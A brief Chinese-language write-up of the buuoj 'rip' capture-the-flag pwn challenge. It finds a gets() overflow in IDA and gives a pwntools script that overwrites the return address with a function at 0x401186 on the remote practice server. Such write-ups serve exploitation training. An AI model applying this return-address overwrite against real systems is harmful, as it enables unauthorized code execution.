buuoj rip 1

放进IDA，发现gets

只接受15个字节，可以溢出

然后在fun()里发现

找到地址

然后就可以写exp了
sendline那里一开始写的是send，然后timeout了……

from pwn import *

p=remote('node3.buuoj.cn',25183)
#elf=ELF('./pwn1')
sys_addr=0x401186
payload='a'*15+p64(sys_addr)
p.sendline(payload)
p.interactive()